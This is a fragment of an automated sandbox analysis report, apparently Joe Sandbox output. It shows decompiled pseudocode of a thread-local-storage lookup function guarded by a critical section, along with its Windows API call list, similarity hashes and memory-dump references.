                                                      • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                      • String ID:
                                                      • API String ID: 2895727460-0
                                                      • Opcode ID: 8525257333676ca08d676e7b2a81b6225231d4ca005925c9b4ed6641576d303d
                                                      • Instruction ID: 11894b6c2aef66c6a57d0d31d06213815613db8dfd1157861ab68b14672cec20
                                                      • Opcode Fuzzy Hash: 8525257333676ca08d676e7b2a81b6225231d4ca005925c9b4ed6641576d303d
                                                      • Instruction Fuzzy Hash: CDF0F6B72001049BDB205F98EC44759B799EBE3319F13103BE04092591DB7D55848E6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040F03C(long* __ecx, signed int _a4) {
                                                      				void* _t9;
                                                      				struct _CRITICAL_SECTION* _t12;
                                                      				signed int _t14;
                                                      				long* _t16;
                                                      
                                                      				_t16 = __ecx;
                                                      				_t1 =  &(_t16[7]); // 0x4465f0
                                                      				_t12 = _t1;
                                                      				EnterCriticalSection(_t12);
                                                      				_t14 = _a4;
                                                      				if(_t14 <= 0) {
                                                      					L5:
                                                      					LeaveCriticalSection(_t12);
                                                      					return 0;
                                                      				}
                                                      				_t3 =  &(_t16[3]); // 0x3
                                                      				if(_t14 >=  *_t3) {
                                                      					goto L5;
                                                      				}
                                                      				_t9 = TlsGetValue( *_t16);
                                                      				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                                                      					goto L5;
                                                      				} else {
                                                      					LeaveCriticalSection(_t12);
                                                      					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                                                      				}
                                                      			}








                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F045
                                                      • TlsGetValue.KERNEL32(004465D4,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F05A
                                                      • LeaveCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F070
                                                      • LeaveCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F07B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterValue
                                                      • String ID:
                                                      • API String ID: 3969253408-0
                                                      • Opcode ID: 9a40517444bb365cbe8405af2ef5f1505744aac530f5d2e3c0f55a5ba20e43c5
                                                      • Instruction ID: 60d108fa28f27cf260cddbd5588e553d64dca512099a42e32762409037fd1fc8
                                                      • Opcode Fuzzy Hash: 9a40517444bb365cbe8405af2ef5f1505744aac530f5d2e3c0f55a5ba20e43c5
                                                      • Instruction Fuzzy Hash: 7FF0F47A200A009FC6308F64DC48D5A77A9EAD4351316957BE442A3562DA78F989CA54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%